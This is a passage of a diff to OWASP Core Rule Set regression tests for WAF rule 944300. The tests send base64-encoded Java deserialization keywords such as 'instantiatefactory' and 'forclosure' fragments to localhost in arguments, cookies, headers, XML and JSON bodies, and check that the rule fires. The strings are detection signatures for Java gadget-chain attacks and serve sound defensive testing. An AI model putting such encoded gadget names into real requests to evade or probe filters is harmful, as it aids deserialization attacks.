"HTTP/1.0" + data: "Bmb3JjbG9zdXJl=test" + output: + log_contains: "id \"944300\"" + - test_id: 124 desc: "Cookie test includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Bmb3JjbG9zdXJl - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-125 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bmb3JjbG9zdXJl + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 125 desc: "Cookie name includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Bmb3JjbG9zdXJl=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-126 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bmb3JjbG9zdXJl=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 126 desc: "Request header test includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Bmb3JjbG9zdXJl - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-127 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bmb3JjbG9zdXJl + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 127 desc: "XML attribute value includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-128 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 128 desc: "XML element value includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bmb3JjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-129 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bmb3JjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_id: 129 desc: "Nested XML element value includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Bmb3JjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-130 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Bmb3JjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_id: 130 desc: "Content-Type text/plain includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Bmb3JjbG9zdXJl" - output: - log_contains: "id \"944300\"" - - test_title: 944300-131 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Bmb3JjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_id: 131 desc: "Content-Type application/json arg value includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Bmb3JjbG9zdXJl\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-132 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Bmb3JjbG9zdXJl\"}" + output: + log_contains: "id \"944300\"" + - test_id: 132 desc: "Content-Type application/json arg name includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Bmb3JjbG9zdXJl\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-133 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Bmb3JjbG9zdXJl\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 133 desc: "Argument test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=aW5zdGFudGlhdGVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-134 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_id: 134 desc: "Argument name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGVmYWN0b3J5=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-135 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGVmYWN0b3J5=test" + output: + log_contains: "id \"944300\"" + - test_id: 135 desc: "Cookie test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=aW5zdGFudGlhdGVmYWN0b3J5 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-136 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=aW5zdGFudGlhdGVmYWN0b3J5 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 136 desc: "Cookie name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: aW5zdGFudGlhdGVmYWN0b3J5=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-137 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: aW5zdGFudGlhdGVmYWN0b3J5=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 137 desc: "Request header test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: aW5zdGFudGlhdGVmYWN0b3J5 - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-138 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: aW5zdGFudGlhdGVmYWN0b3J5 + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 138 desc: "XML attribute value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-139 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 139 desc: "XML element value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-140 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_id: 140 desc: "Nested XML element value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "aW5zdGFudGlhdGVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-141 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_id: 141 desc: "Content-Type text/plain includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=aW5zdGFudGlhdGVmYWN0b3J5" - output: - log_contains: "id \"944300\"" - - test_title: 944300-142 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_id: 142 desc: "Content-Type application/json arg value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"aW5zdGFudGlhdGVmYWN0b3J5\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-143 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"aW5zdGFudGlhdGVmYWN0b3J5\"}" + output: + log_contains: "id \"944300\"" + - test_id: 143 desc: "Content-Type application/json arg name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"aW5zdGFudGlhdGVmYWN0b3J5\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-144 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"aW5zdGFudGlhdGVmYWN0b3J5\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_id: 144 desc: "Argument test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-145 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_id: 145 desc: "Argument name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Gluc3RhbnRpYXRlZmFjdG9yeQ=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-146 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRlZmFjdG9yeQ=test" + output: + log_contains: "id \"944300\"" + - test_id: 146 desc: "Cookie test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Gluc3RhbnRpYXRlZmFjdG9yeQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-147 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Gluc3RhbnRpYXRlZmFjdG9yeQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 147 desc: "Cookie name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Gluc3RhbnRpYXRlZmFjdG9yeQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-148 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Gluc3RhbnRpYXRlZmFjdG9yeQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 148 desc: "Request header test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Gluc3RhbnRpYXRlZmFjdG9yeQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-149 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Gluc3RhbnRpYXRlZmFjdG9yeQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_id: 149 desc: "XML attribute value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-150 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_id: 150 desc: "XML element value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 